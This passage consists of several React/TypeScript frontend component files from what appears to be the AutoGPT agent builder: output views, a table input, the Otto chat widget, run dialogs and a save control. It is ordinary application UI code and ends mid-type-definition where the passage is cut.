import React, { useContext, useMemo, useState } from "react";
import { Button } from "@/components/__legacy__/ui/button";
import { Maximize2 } from "lucide-react";
import * as Separator from "@radix-ui/react-separator";
import { ContentRenderer } from "@/components/__legacy__/ui/render";
import type { OutputMetadata } from "@/components/contextual/OutputRenderers";
import {
globalRegistry,
OutputItem,
} from "@/components/contextual/OutputRenderers";
import { Flag, useGetFlag } from "@/services/feature-flags/use-get-flag";
import { beautifyString } from "@/lib/utils";
import { BuilderContext } from "./Flow/Flow";
import ExpandableOutputDialog from "./ExpandableOutputDialog";
type NodeOutputsProps = {
title?: string;
truncateLongData?: boolean;
data: { [key: string]: Array<any> };
};
export default function NodeOutputs({
title,
truncateLongData,
data,
}: NodeOutputsProps) {
const builderContext = useContext(BuilderContext);
const enableEnhancedOutputHandling = useGetFlag(
Flag.ENABLE_ENHANCED_OUTPUT_HANDLING,
);
const [expandedDialog, setExpandedDialog] = useState<{
isOpen: boolean;
execId: string;
pinName: string;
data: any[];
} | null>(null);
if (!builderContext) {
throw new Error(
"BuilderContext consumer must be inside FlowEditor component",
);
}
const { getNodeTitle } = builderContext;
// Prepare renderers for each item when enhanced mode is enabled
const getItemRenderer = useMemo(() => {
if (!enableEnhancedOutputHandling) return null;
return (item: unknown) => {
const metadata: OutputMetadata = {};
return globalRegistry.getRenderer(item, metadata);
};
}, [enableEnhancedOutputHandling]);
const getBeautifiedPinName = (pin: string) => {
if (!pin.startsWith("tools_^_")) {
return beautifyString(pin);
}
// Special handling for tool pins: replace node ID with node title
const toolNodeID = pin.slice(8).split("_~_")[0]; // tools_^_{node_id}_~_{field}
const toolNodeTitle = getNodeTitle(toolNodeID);
return toolNodeTitle
? beautifyString(pin.replace(toolNodeID, toolNodeTitle))
: beautifyString(pin);
};
const openExpandedView = (pinName: string, pinData: any[]) => {
setExpandedDialog({
isOpen: true,
execId: title || "Node Output",
pinName,
data: pinData,
});
};
const closeExpandedView = () => {
setExpandedDialog(null);
};
return (
<div className="m-4 space-y-4">
{title && <strong className="mt-2flex">{title}</strong>}
{Object.entries(data).map(([pin, dataArray]) => (
<div key={pin} className="group">
<div className="flex items-center justify-between">
<div className="flex items-center">
<strong className="mr-2">Pin:</strong>
<span>{getBeautifiedPinName(pin)}</span>
</div>
{(truncateLongData || dataArray.length > 10) && (
<Button
variant="outline"
size="sm"
onClick={() => openExpandedView(pin, dataArray)}
className="hidden items-center gap-1 group-hover:flex"
title="Expand Full View"
>
<Maximize2 size={14} />
Expand
</Button>
)}
</div>
<div className="mt-2">
<strong className="mr-2">Data:</strong>
<div className="mt-1">
{dataArray.slice(0, 10).map((item, index) => {
const renderer = getItemRenderer?.(item);
if (enableEnhancedOutputHandling && renderer) {
const metadata: OutputMetadata = {};
return (
<React.Fragment key={index}>
<OutputItem
value={item}
metadata={metadata}
renderer={renderer}
/>
{index < Math.min(dataArray.length, 10) - 1 && ", "}
</React.Fragment>
);
}
return (
<React.Fragment key={index}>
<ContentRenderer
value={item}
truncateLongData={truncateLongData}
/>
{index < Math.min(dataArray.length, 10) - 1 && ", "}
</React.Fragment>
);
})}
{dataArray.length > 10 && (
<span style={{ color: "#888" }}>
<br />
<b></b>
<br />
<span>and {dataArray.length - 10} more</span>
</span>
)}
</div>
<Separator.Root className="my-4 h-[1px] bg-gray-300" />
</div>
</div>
))}
{expandedDialog && (
<ExpandableOutputDialog
isOpen={expandedDialog.isOpen}
onClose={closeExpandedView}
execId={expandedDialog.execId}
pinName={expandedDialog.pinName}
data={expandedDialog.data}
/>
)}
</div>
);
}

View File

@@ -0,0 +1,205 @@
import { FC, useCallback, useEffect, useState } from "react";
import NodeHandle from "@/app/(platform)/build/components/legacy-builder/NodeHandle";
import type {
BlockIOTableSubSchema,
TableCellValue,
TableRow,
} from "@/lib/autogpt-server-api/types";
import type { ConnectedEdge } from "./CustomNode/CustomNode";
import { cn } from "@/lib/utils";
import { PlusIcon, XIcon } from "@phosphor-icons/react";
import { Button } from "@/components/atoms/Button/Button";
import { Input } from "@/components/atoms/Input/Input";
interface NodeTableInputProps {
/** Unique identifier for the node in the builder graph */
nodeId: string;
/** Key identifier for this specific input field within the node */
selfKey: string;
/** Schema definition for the table structure */
schema: BlockIOTableSubSchema;
/** Column headers for the table */
headers: string[];
/** Initial row data for the table */
rows?: TableRow[];
/** Validation errors mapped by field key */
errors: { [key: string]: string | undefined };
/** Graph connections between nodes in the builder */
connections: ConnectedEdge[];
/** Callback when table data changes */
handleInputChange: (key: string, value: TableRow[]) => void;
/** Callback when input field is clicked (for builder selection) */
handleInputClick: (key: string) => void;
/** Additional CSS classes */
className?: string;
/** Display name for the input field */
displayName?: string;
}
/**
* Table input component for the workflow builder interface.
*
* This component is specifically designed for use in the agent builder where users
* design workflows with connected nodes. It includes graph connection capabilities
* via NodeHandle and is tightly integrated with the builder's state management.
*
* @warning Do NOT use this component in runtime/execution contexts (like RunAgentInputs).
* For runtime table inputs, use a simpler implementation without builder-specific features.
*
* @example
* ```tsx
* <NodeTableInput
* nodeId="node-123"
* selfKey="table_data"
* schema={tableSchema}
* headers={["Name", "Value"]}
* rows={existingData}
* connections={graphConnections}
* handleInputChange={handleChange}
* handleInputClick={handleClick}
* errors={{}}
* />
* ```
*
* @see Used exclusively in: `/app/(platform)/build/components/legacy-builder/NodeInputs.tsx`
*/
export const NodeTableInput: FC<NodeTableInputProps> = ({
nodeId,
selfKey,
schema,
headers,
rows = [],
errors,
connections,
handleInputChange,
handleInputClick: _handleInputClick,
className,
displayName,
}) => {
const [tableData, setTableData] = useState<TableRow[]>(rows);
// Sync with parent state when rows change
useEffect(() => {
setTableData(rows);
}, [rows]);
const isConnected = (key: string) =>
connections.some((c) => c.targetHandle === key && c.target === nodeId);
const updateTableData = useCallback(
(newData: TableRow[]) => {
setTableData(newData);
handleInputChange(selfKey, newData);
},
[selfKey, handleInputChange],
);
const updateCell = (
rowIndex: number,
header: string,
value: TableCellValue,
) => {
const newData = [...tableData];
if (!newData[rowIndex]) {
newData[rowIndex] = {};
}
newData[rowIndex][header] = value;
updateTableData(newData);
};
const addRow = () => {
if (!headers || headers.length === 0) {
return;
}
const newRow: TableRow = {};
headers.forEach((header) => {
newRow[header] = "";
});
updateTableData([...tableData, newRow]);
};
const removeRow = (index: number) => {
const newData = tableData.filter((_, i) => i !== index);
updateTableData(newData);
};
return (
<div className={cn("w-full space-y-2", className)}>
<NodeHandle
title={displayName || selfKey}
keyName={selfKey}
schema={schema}
isConnected={isConnected(selfKey)}
isRequired={false}
side="left"
/>
{!isConnected(selfKey) && (
<div className="nodrag overflow-x-auto">
<table className="w-full border-collapse">
<thead>
<tr>
{headers.map((header, index) => (
<th
key={index}
className="border border-gray-300 bg-gray-100 px-2 py-1 text-left text-sm font-medium dark:border-gray-600 dark:bg-gray-800"
>
{header}
</th>
))}
<th className="w-10"></th>
</tr>
</thead>
<tbody>
{tableData.map((row, rowIndex) => (
<tr key={rowIndex}>
{headers.map((header, colIndex) => (
<td
key={colIndex}
className="border border-gray-300 p-1 dark:border-gray-600"
>
<Input
id={`${selfKey}-${rowIndex}-${header}`}
label={header}
type="text"
value={String(row[header] || "")}
onChange={(e) =>
updateCell(rowIndex, header, e.target.value)
}
className="h-8 w-full"
placeholder={`Enter ${header}`}
/>
</td>
))}
<td className="p-1">
<Button
variant="ghost"
size="small"
onClick={() => removeRow(rowIndex)}
className="h-8 w-8 p-0"
>
<XIcon />
</Button>
</td>
</tr>
))}
</tbody>
</table>
<Button
className="mt-2 bg-gray-200 font-normal text-black hover:text-white dark:bg-gray-700 dark:text-white dark:hover:bg-gray-600"
onClick={addRow}
size="small"
>
<PlusIcon className="mr-2" /> Add Row
</Button>
</div>
)}
{errors[selfKey] && (
<span className="text-sm text-red-500">{errors[selfKey]}</span>
)}
</div>
);
};

View File

@@ -0,0 +1,311 @@
"use client";
import React, { useEffect, useState, useRef } from "react";
import ReactMarkdown from "react-markdown";
import type { GraphID } from "@/lib/autogpt-server-api/types";
import { askOtto } from "@/app/(platform)/build/actions";
import { cn } from "@/lib/utils";
import { environment } from "@/services/environment";
interface Message {
type: "user" | "assistant";
content: string;
}
export default function OttoChatWidget({
graphID,
className,
}: {
graphID?: GraphID;
className?: string;
}): React.ReactNode {
const [isOpen, setIsOpen] = useState(false);
const [messages, setMessages] = useState<Message[]>([]);
const [inputValue, setInputValue] = useState("");
const [isProcessing, setIsProcessing] = useState(false);
const [includeGraphData, setIncludeGraphData] = useState(false);
const messagesEndRef = useRef<HTMLDivElement>(null);
useEffect(() => {
// Add welcome message when component mounts
if (messages.length === 0) {
setMessages([
{
type: "assistant",
content: "Hello, I am Otto! Ask me anything about AutoGPT!",
},
]);
}
}, [messages.length]);
useEffect(() => {
// Scroll to bottom whenever messages change
messagesEndRef.current?.scrollIntoView({ behavior: "smooth" });
}, [messages]);
const handleSubmit = async (e: React.FormEvent) => {
e.preventDefault();
if (!inputValue.trim() || isProcessing) return;
const userMessage = inputValue.trim();
setInputValue("");
setIsProcessing(true);
// Add user message to chat
setMessages((prev) => [...prev, { type: "user", content: userMessage }]);
// Add temporary processing message
setMessages((prev) => [
...prev,
{ type: "assistant", content: "Processing your question..." },
]);
const conversationHistory = messages.reduce<
{ query: string; response: string }[]
>((acc, msg, i, arr) => {
if (
msg.type === "user" &&
i + 1 < arr.length &&
arr[i + 1].type === "assistant" &&
arr[i + 1].content !== "Processing your question..."
) {
acc.push({
query: msg.content,
response: arr[i + 1].content,
});
}
return acc;
}, []);
try {
const data = await askOtto(
userMessage,
conversationHistory,
includeGraphData,
graphID,
);
// Check if the response contains an error
if ("error" in data && data.error === true) {
// Handle different error types
let errorMessage =
"Sorry, there was an error processing your message. Please try again.";
if (data.answer === "Authentication required") {
errorMessage = "Please sign in to use the chat feature.";
} else if (data.answer === "Failed to connect to Otto service") {
errorMessage =
"Otto service is currently unavailable. Please try again later.";
} else if (data.answer.includes("timed out")) {
errorMessage = "Request timed out. Please try again later.";
}
// Remove processing message and add error message
setMessages((prev) => [
...prev.slice(0, -1),
{ type: "assistant", content: errorMessage },
]);
} else {
// Remove processing message and add actual response
setMessages((prev) => [
...prev.slice(0, -1),
{ type: "assistant", content: data.answer },
]);
}
} catch (error) {
console.error("Unexpected error in chat widget:", error);
setMessages((prev) => [
...prev.slice(0, -1),
{
type: "assistant",
content:
"An unexpected error occurred. Please refresh the page and try again.",
},
]);
} finally {
setIsProcessing(false);
setIncludeGraphData(false);
}
};
// Don't render the chat widget if we're not on the build page or in local mode
if (environment.isLocal()) {
return null;
}
if (!isOpen) {
return (
<div className={className}>
<button
onClick={() => setIsOpen(true)}
className="inline-flex h-14 w-14 items-center justify-center whitespace-nowrap rounded-2xl bg-[rgba(65,65,64,1)] text-neutral-50 shadow transition-colors hover:bg-neutral-900/90 focus-visible:outline-none focus-visible:ring-1 focus-visible:ring-neutral-950 disabled:pointer-events-none disabled:opacity-50 dark:bg-neutral-50 dark:text-neutral-900 dark:hover:bg-neutral-50/90 dark:focus-visible:ring-neutral-300"
aria-label="Open chat widget"
>
<svg
viewBox="0 0 24 24"
className="h-6 w-6"
stroke="currentColor"
strokeWidth="2"
fill="none"
strokeLinecap="round"
strokeLinejoin="round"
>
<path d="M21 15a2 2 0 0 1-2 2H7l-4 4V5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2z" />
</svg>
</button>
</div>
);
}
return (
<div
className={cn(
"flex h-[600px] w-[600px] flex-col rounded-lg border bg-background shadow-xl",
className,
"z-40",
)}
>
{/* Header */}
<div className="flex items-center justify-between border-b p-4">
<h2 className="font-semibold">Otto Assistant</h2>
<button
onClick={() => setIsOpen(false)}
className="text-muted-foreground transition-colors hover:text-foreground"
aria-label="Close chat"
>
<svg
viewBox="0 0 24 24"
className="h-5 w-5"
stroke="currentColor"
strokeWidth="2"
fill="none"
strokeLinecap="round"
strokeLinejoin="round"
>
<line x1="18" y1="6" x2="6" y2="18" />
<line x1="6" y1="6" x2="18" y2="18" />
</svg>
</button>
</div>
{/* Messages */}
<div className="flex-1 space-y-4 overflow-y-auto p-4">
{messages.map((message, index) => (
<div
key={index}
className={`flex ${message.type === "user" ? "justify-end" : "justify-start"}`}
>
<div
className={`max-w-[80%] rounded-lg p-3 ${
message.type === "user"
? "ml-4 bg-black text-white"
: "mr-4 bg-[#8b5cf6] text-white"
}`}
>
{message.type === "user" ? (
message.content
) : (
<ReactMarkdown
className="prose prose-sm dark:prose-invert max-w-none"
components={{
p: ({ children }) => (
<p className="mb-2 last:mb-0">{children}</p>
),
code(props) {
const { children, className, node: _, ...rest } = props;
const match = /language-(\w+)/.exec(className || "");
return match ? (
<pre className="overflow-x-auto rounded-md bg-muted-foreground/20 p-3">
<code className="font-mono text-sm" {...rest}>
{children}
</code>
</pre>
) : (
<code
className="rounded-md bg-muted-foreground/20 px-1 py-0.5 font-mono text-sm"
{...rest}
>
{children}
</code>
);
},
ul: ({ children }) => (
<ul className="mb-2 list-disc pl-4 last:mb-0">
{children}
</ul>
),
ol: ({ children }) => (
<ol className="mb-2 list-decimal pl-4 last:mb-0">
{children}
</ol>
),
li: ({ children }) => (
<li className="mb-1 last:mb-0">{children}</li>
),
}}
>
{message.content}
</ReactMarkdown>
)}
</div>
</div>
))}
<div ref={messagesEndRef} />
</div>
{/* Input */}
<form onSubmit={handleSubmit} className="border-t p-4">
<div className="flex flex-col gap-2">
<div className="flex gap-2">
<input
type="text"
value={inputValue}
onChange={(e) => setInputValue(e.target.value)}
placeholder="Type your message..."
className="flex-1 rounded-md border bg-background px-3 py-2 focus:outline-none focus:ring-2 focus:ring-primary"
disabled={isProcessing}
/>
<button
type="submit"
disabled={isProcessing}
className="rounded-md bg-primary px-4 py-2 text-primary-foreground transition-colors hover:bg-primary/90 disabled:opacity-50"
>
Send
</button>
</div>
{graphID && (
<button
type="button"
onClick={() => {
setIncludeGraphData((prev) => !prev);
}}
className={`flex items-center gap-2 rounded border px-2 py-1.5 text-sm transition-all duration-200 ${
includeGraphData
? "border-primary/30 bg-primary/10 text-primary hover:shadow-[0_0_10px_3px_rgba(139,92,246,0.3)]"
: "border-transparent bg-muted text-muted-foreground hover:bg-muted/80 hover:shadow-[0_0_10px_3px_rgba(139,92,246,0.15)]"
}`}
>
<svg
viewBox="0 0 24 24"
className="h-4 w-4"
stroke="currentColor"
strokeWidth="2"
fill="none"
strokeLinecap="round"
strokeLinejoin="round"
>
<rect x="3" y="3" width="18" height="18" rx="2" ry="2" />
<circle cx="8.5" cy="8.5" r="1.5" />
<polyline points="21 15 16 10 5 21" />
</svg>
{includeGraphData
? "Graph data will be included"
: "Include graph data"}
</button>
)}
</div>
</form>
</div>
);
}

View File

@@ -0,0 +1,50 @@
import React, { FC } from "react";
import { Button } from "../../../../../components/__legacy__/ui/button";
import { NodeExecutionResult } from "@/lib/autogpt-server-api/types";
import DataTable from "./DataTable";
import { Separator } from "@/components/__legacy__/ui/separator";
interface OutputModalProps {
isOpen: boolean;
onClose: () => void;
executionResults: {
execId: string;
data: NodeExecutionResult["output_data"];
}[];
}
const OutputModalComponent: FC<OutputModalProps> = ({
isOpen,
onClose,
executionResults,
}) => {
if (!isOpen) {
return null;
}
return (
<div className="nodrag nowheel fixed inset-0 flex items-center justify-center bg-white bg-opacity-60">
<div className="w-[500px] max-w-[90%] rounded-lg border-[1.5px] bg-white p-5">
<strong>Output Data History</strong>
<div className="my-2 max-h-[384px] flex-grow overflow-y-auto rounded-md p-2">
{executionResults.map((data, i) => (
<>
<DataTable
key={i}
title={data.execId}
data={data.data}
truncateLongData={true}
/>
<Separator />
</>
))}
</div>
<div className="mt-2.5 flex justify-end gap-2.5">
<Button onClick={onClose}>Close</Button>
</div>
</div>
</div>
);
};
export default OutputModalComponent;

View File

@@ -0,0 +1,96 @@
import { useCallback } from "react";
import { AgentRunDraftView } from "@/app/(platform)/library/agents/[id]/components/OldAgentLibraryView/components/agent-run-draft-view";
import { Dialog } from "@/components/molecules/Dialog/Dialog";
import type {
CredentialsMetaInput,
Graph,
} from "@/lib/autogpt-server-api/types";
interface RunInputDialogProps {
isOpen: boolean;
doClose: () => void;
graph: Graph;
doRun?: (
inputs: Record<string, any>,
credentialsInputs: Record<string, CredentialsMetaInput>,
) => Promise<void> | void;
doCreateSchedule?: (
cronExpression: string,
scheduleName: string,
inputs: Record<string, any>,
credentialsInputs: Record<string, CredentialsMetaInput>,
) => Promise<void> | void;
}
export function RunnerInputDialog({
isOpen,
doClose,
graph,
doRun,
doCreateSchedule,
}: RunInputDialogProps) {
const handleRun = useCallback(
doRun
? async (
inputs: Record<string, any>,
credentials_inputs: Record<string, CredentialsMetaInput>,
) => {
await doRun(inputs, credentials_inputs);
doClose();
}
: async () => {},
[doRun, doClose],
);
const handleSchedule = useCallback(
doCreateSchedule
? async (
cronExpression: string,
scheduleName: string,
inputs: Record<string, any>,
credentialsInputs: Record<string, CredentialsMetaInput>,
) => {
await doCreateSchedule(
cronExpression,
scheduleName,
inputs,
credentialsInputs,
);
doClose();
}
: async () => {},
[doCreateSchedule, doClose],
);
return (
<Dialog
title="Run your agent"
controlled={{
isOpen,
set: (open) => {
if (!open) doClose();
},
}}
onClose={doClose}
styling={{
maxWidth: "56rem",
width: "90vw",
}}
>
<Dialog.Content>
<div className="flex flex-col p-10">
<p className="mt-2 text-sm text-zinc-600">{graph.name}</p>
<AgentRunDraftView
className="p-0"
graph={graph}
doRun={doRun ? handleRun : undefined}
onRun={doRun ? undefined : doClose}
doCreateSchedule={doCreateSchedule ? handleSchedule : undefined}
onCreateSchedule={doCreateSchedule ? undefined : doClose}
/>
</div>
</Dialog.Content>
</Dialog>
);
}

View File

@@ -0,0 +1,156 @@
import React from "react";
import {
Sheet,
SheetContent,
SheetHeader,
SheetTitle,
SheetDescription,
} from "@/components/__legacy__/ui/sheet";
import { ScrollArea } from "@/components/__legacy__/ui/scroll-area";
import { Label } from "@/components/__legacy__/ui/label";
import { Textarea } from "@/components/__legacy__/ui/textarea";
import { Button } from "@/components/__legacy__/ui/button";
import { Clipboard } from "lucide-react";
import { useToast } from "@/components/molecules/Toast/use-toast";
export type OutputNodeInfo = {
metadata: {
name: string;
description: string;
};
result?: any;
};
interface OutputModalProps {
isOpen: boolean;
doClose: () => void;
outputs: OutputNodeInfo[];
graphExecutionError?: string | null;
}
const formatOutput = (output: any): string => {
if (typeof output === "object") {
try {
if (
Array.isArray(output) &&
output.every((item) => typeof item === "string")
) {
return output.join("\n").replace(/\\n/g, "\n");
}
return JSON.stringify(output, null, 2);
} catch (error) {
return `Error formatting output: ${(error as Error).message}`;
}
}
if (typeof output === "string") {
return output.replace(/\\n/g, "\n");
}
return String(output);
};
export function RunnerOutputUI({
isOpen,
doClose,
outputs,
graphExecutionError,
}: OutputModalProps) {
const { toast } = useToast();
const copyOutput = (name: string, output: any) => {
const formattedOutput = formatOutput(output);
navigator.clipboard.writeText(formattedOutput).then(() => {
toast({
title: `"${name}" output copied to clipboard!`,
duration: 2000,
});
});
};
const adjustTextareaHeight = (textarea: HTMLTextAreaElement) => {
textarea.style.height = "auto";
textarea.style.height = `${textarea.scrollHeight}px`;
};
return (
<Sheet open={isOpen} onOpenChange={doClose}>
<SheetContent
side="right"
className="flex h-full w-full flex-col overflow-hidden sm:max-w-[600px]"
>
<SheetHeader className="px-2 py-2">
<SheetTitle className="text-xl">Run Outputs</SheetTitle>
<SheetDescription className="mt-1 text-sm">
View the outputs from your agent run.
</SheetDescription>
</SheetHeader>
<div className="flex-grow overflow-y-auto px-2 py-2">
<ScrollArea className="h-full overflow-auto pr-4">
<div className="space-y-4">
{graphExecutionError && (
<div className="rounded-md border border-red-200 bg-red-50 p-3 dark:border-red-800 dark:bg-red-900/20">
<p className="text-sm text-red-800 dark:text-red-200">
<strong>Error:</strong> {graphExecutionError}
</p>
</div>
)}
{outputs && outputs.length > 0 ? (
outputs.map((output, i) => (
<div key={i} className="space-y-1">
<Label className="text-base font-semibold">
{output.metadata.name || "Unnamed Output"}
</Label>
{output.metadata.description && (
<Label className="block text-sm text-gray-600">
{output.metadata.description}
</Label>
)}
<div className="group relative rounded-md bg-gray-100 p-2">
<Button
className="absolute right-1 top-1 z-10 m-1 hidden p-2 group-hover:block"
variant="outline"
size="icon"
onClick={() =>
copyOutput(
output.metadata.name || "Unnamed Output",
output.result,
)
}
title="Copy Output"
>
<Clipboard size={18} />
</Button>
<Textarea
readOnly
value={formatOutput(output.result ?? "No output yet")}
className="w-full resize-none whitespace-pre-wrap break-words border-none bg-transparent text-sm"
style={{
height: "auto",
minHeight: "2.5rem",
maxHeight: "400px",
}}
ref={(el) => {
if (el) {
adjustTextareaHeight(el);
if (el.scrollHeight > 400) {
el.style.height = "400px";
}
}
}}
/>
</div>
</div>
))
) : (
<p>No output blocks available.</p>
)}
</div>
</ScrollArea>
</div>
</SheetContent>
</Sheet>
);
}
export default RunnerOutputUI;

View File

@@ -0,0 +1,117 @@
import React, {
useState,
forwardRef,
useImperativeHandle,
useMemo,
} from "react";
import { Node } from "@xyflow/react";
import { CustomNodeData } from "@/app/(platform)/build/components/legacy-builder/CustomNode/CustomNode";
import {
BlockUIType,
CredentialsMetaInput,
Graph,
} from "@/lib/autogpt-server-api/types";
import RunnerOutputUI, { OutputNodeInfo } from "./RunnerOutputUI";
import { RunnerInputDialog } from "./RunnerInputUI";
interface RunnerUIWrapperProps {
graph: Graph;
nodes: Node<CustomNodeData>[];
graphExecutionError?: string | null;
saveAndRun: (
inputs: Record<string, any>,
credentialsInputs: Record<string, CredentialsMetaInput>,
) => void;
createRunSchedule: (
cronExpression: string,
scheduleName: string,
inputs: Record<string, any>,
credentialsInputs: Record<string, CredentialsMetaInput>,
) => Promise<void>;
}
export interface RunnerUIWrapperRef {
openRunInputDialog: () => void;
openRunnerOutput: () => void;
runOrOpenInput: () => void;
}
const RunnerUIWrapper = forwardRef<RunnerUIWrapperRef, RunnerUIWrapperProps>(
(
{ graph, nodes, graphExecutionError, saveAndRun, createRunSchedule },
ref,
) => {
const [isRunInputDialogOpen, setIsRunInputDialogOpen] = useState(false);
const [isRunnerOutputOpen, setIsRunnerOutputOpen] = useState(false);
const graphInputs = graph.input_schema.properties;
const graphOutputs = useMemo((): OutputNodeInfo[] => {
const outputNodes = nodes.filter(
(node) => node.data.uiType === BlockUIType.OUTPUT,
);
return outputNodes.map(
(node) =>
({
metadata: {
name: node.data.hardcodedValues.name || "Output",
description:
node.data.hardcodedValues.description ||
"Output from the agent",
},
result:
(node.data.executionResults as any)
?.map((result: any) => result?.data?.output)
.join("\n--\n") || "No output yet",
}) satisfies OutputNodeInfo,
);
}, [nodes]);
const openRunInputDialog = () => setIsRunInputDialogOpen(true);
const openRunnerOutput = () => setIsRunnerOutputOpen(true);
const runOrOpenInput = () => {
if (
Object.keys(graphInputs).length > 0 ||
Object.keys(graph.credentials_input_schema.properties).length > 0
) {
openRunInputDialog();
} else {
saveAndRun({}, {});
}
};
useImperativeHandle(
ref,
() =>
({
openRunInputDialog,
openRunnerOutput,
runOrOpenInput,
}) satisfies RunnerUIWrapperRef,
);
return (
<>
<RunnerInputDialog
isOpen={isRunInputDialogOpen}
doClose={() => setIsRunInputDialogOpen(false)}
graph={graph}
doRun={saveAndRun}
doCreateSchedule={createRunSchedule}
/>
<RunnerOutputUI
isOpen={isRunnerOutputOpen}
doClose={() => setIsRunnerOutputOpen(false)}
outputs={graphOutputs}
graphExecutionError={graphExecutionError}
/>
</>
);
},
);
RunnerUIWrapper.displayName = "RunnerUIWrapper";
export default RunnerUIWrapper;

View File

@@ -0,0 +1,217 @@
import React, { useEffect, useState } from "react";
import {
Popover,
PopoverContent,
PopoverTrigger,
} from "@/components/__legacy__/ui/popover";
import { Card, CardContent, CardFooter } from "@/components/__legacy__/ui/card";
import { Input } from "@/components/__legacy__/ui/input";
import { Button } from "@/components/__legacy__/ui/button";
import { GraphMeta } from "@/lib/autogpt-server-api";
import { Label } from "@/components/__legacy__/ui/label";
import { IconSave } from "@/components/__legacy__/ui/icons";
import {
Tooltip,
TooltipContent,
TooltipTrigger,
} from "@/components/atoms/Tooltip/BaseTooltip";
import { useToast } from "@/components/molecules/Toast/use-toast";
import { useQueryClient } from "@tanstack/react-query";
import { getGetV2ListMySubmissionsQueryKey } from "@/app/api/__generated__/endpoints/store/store";
import { CronExpressionDialog } from "@/app/(platform)/library/agents/[id]/components/OldAgentLibraryView/components/cron-scheduler-dialog";
import { humanizeCronExpression } from "@/lib/cron-expression-utils";
import { CalendarClockIcon } from "lucide-react";
interface SaveControlProps {
agentMeta: GraphMeta | null;
agentName: string;
agentDescription: string;
agentRecommendedScheduleCron: string;
canSave: boolean;
onSave: () => Promise<void>;
onNameChange: (name: string) => void;
onDescriptionChange: (description: string) => void;
onRecommendedScheduleCronChange: (cron: string) => void;
pinSavePopover: boolean;
}
/**
* A SaveControl component to be used within the ControlPanel. It allows the user to save the agent.
* @param {Object} SaveControlProps - The properties of the SaveControl component.
* @param {GraphMeta | null} SaveControlProps.agentMeta - The agent's metadata, or null if creating a new agent.
* @param {string} SaveControlProps.agentName - The agent's name.
* @param {string} SaveControlProps.agentDescription - The agent's description.
* @param {boolean} SaveControlProps.canSave - Whether the button to save the agent should be enabled.
* @param {() => void} SaveControlProps.onSave - Function to save the agent.
* @param {(name: string) => void} SaveControlProps.onNameChange - Function to handle name changes.
* @param {(description: string) => void} SaveControlProps.onDescriptionChange - Function to handle description changes.
* @returns The SaveControl component.
*/
export const SaveControl = ({
agentMeta,
canSave,
onSave,
agentName,
onNameChange,
agentDescription,
onDescriptionChange,
agentRecommendedScheduleCron,
onRecommendedScheduleCronChange,
pinSavePopover,
}: SaveControlProps) => {
/**
* Note for improvement:
* At the moment we are leveraging onDescriptionChange and onNameChange to handle the changes in the description and name of the agent.
* We should migrate this to be handled with form controls and a form library.
*/
const { toast } = useToast();
const queryClient = useQueryClient();
const [cronScheduleDialogOpen, setCronScheduleDialogOpen] = useState(false);
const handleScheduleChange = (cronExpression: string) => {
onRecommendedScheduleCronChange(cronExpression);
};
useEffect(() => {
const handleKeyDown = async (event: KeyboardEvent) => {
if ((event.ctrlKey || event.metaKey) && event.key === "s") {
event.preventDefault(); // Stop the browser default action
await onSave(); // Call your save function
queryClient.invalidateQueries({
queryKey: getGetV2ListMySubmissionsQueryKey(),
});
toast({
duration: 2000,
title: "All changes saved successfully!",
});
}
};
window.addEventListener("keydown", handleKeyDown);
return () => {
window.removeEventListener("keydown", handleKeyDown);
};
}, [onSave, toast]);
return (
<Popover open={pinSavePopover ? true : undefined}>
<Tooltip delayDuration={500}>
<TooltipTrigger asChild>
<PopoverTrigger asChild>
<Button
variant="ghost"
size="icon"
data-id="save-control-popover-trigger"
data-testid="blocks-control-save-button"
name="Save"
>
<IconSave className="dark:text-gray-300" />
</Button>
</PopoverTrigger>
</TooltipTrigger>
<TooltipContent side="right">Save</TooltipContent>
</Tooltip>
<PopoverContent
side="right"
sideOffset={15}
align="start"
data-id="save-control-popover-content"
className="w-96 max-w-[400px]"
>
<Card className="border-none shadow-none dark:bg-slate-900">
<CardContent className="p-4">
<div className="space-y-3">
<div>
<Label htmlFor="name" className="dark:text-gray-300">
Name
</Label>
<Input
id="name"
placeholder="Enter your agent name"
value={agentName}
onChange={(e) => onNameChange(e.target.value)}
data-id="save-control-name-input"
data-testid="save-control-name-input"
maxLength={100}
className="mt-1"
/>
</div>
<div>
<Label htmlFor="description" className="dark:text-gray-300">
Description
</Label>
<Input
id="description"
placeholder="Your agent description"
value={agentDescription}
onChange={(e) => onDescriptionChange(e.target.value)}
data-id="save-control-description-input"
data-testid="save-control-description-input"
maxLength={500}
className="mt-1"
/>
</div>
<div>
<Label className="dark:text-gray-300">
Recommended Schedule
</Label>
<Button
variant="outline"
onClick={() => setCronScheduleDialogOpen(true)}
className="mt-1 w-full min-w-0 justify-start text-sm"
data-id="save-control-recommended-schedule-button"
data-testid="save-control-recommended-schedule-button"
>
<CalendarClockIcon className="mr-2 h-4 w-4 flex-shrink-0" />
<span className="min-w-0 flex-1 truncate">
{agentRecommendedScheduleCron
? humanizeCronExpression(agentRecommendedScheduleCron)
: "Set schedule"}
</span>
</Button>
</div>
{agentMeta?.version && (
<div>
<Label htmlFor="version" className="dark:text-gray-300">
Version
</Label>
<Input
id="version"
placeholder="Version"
value={agentMeta?.version || "-"}
disabled
data-testid="save-control-version-output"
className="mt-1"
/>
</div>
)}
</div>
</CardContent>
<CardFooter className="flex flex-col items-stretch gap-2">
<Button
className="w-full dark:bg-slate-700 dark:text-slate-100 dark:hover:bg-slate-800"
onClick={onSave}
data-id="save-control-save-agent"
data-testid="save-control-save-agent-button"
disabled={!canSave}
>
Save Agent
</Button>
</CardFooter>
</Card>
</PopoverContent>
<CronExpressionDialog
open={cronScheduleDialogOpen}
setOpen={setCronScheduleDialogOpen}
onSubmit={handleScheduleChange}
defaultCronExpression={agentRecommendedScheduleCron}
title="Recommended Schedule"
/>
</Popover>
);
};

View File

@@ -0,0 +1,95 @@
import { CustomNodeData } from "./CustomNode/CustomNode";
import { CustomEdgeData } from "./CustomEdge/CustomEdge";
import { Edge } from "@xyflow/react";
type ActionType =
| "ADD_NODE"
| "DELETE_NODE"
| "ADD_EDGE"
| "DELETE_EDGE"
| "UPDATE_NODE"
| "MOVE_NODE"
| "UPDATE_INPUT"
| "UPDATE_NODE_POSITION";
type AddNodePayload = { node: CustomNodeData };
type DeleteNodePayload = { nodeId: string };
type AddEdgePayload = { edge: Edge<CustomEdgeData> };
type DeleteEdgePayload = { edgeId: string };
type UpdateNodePayload = { nodeId: string; newData: Partial<CustomNodeData> };
type MoveNodePayload = { nodeId: string; position: { x: number; y: number } };
type UpdateInputPayload = {
nodeId: string;
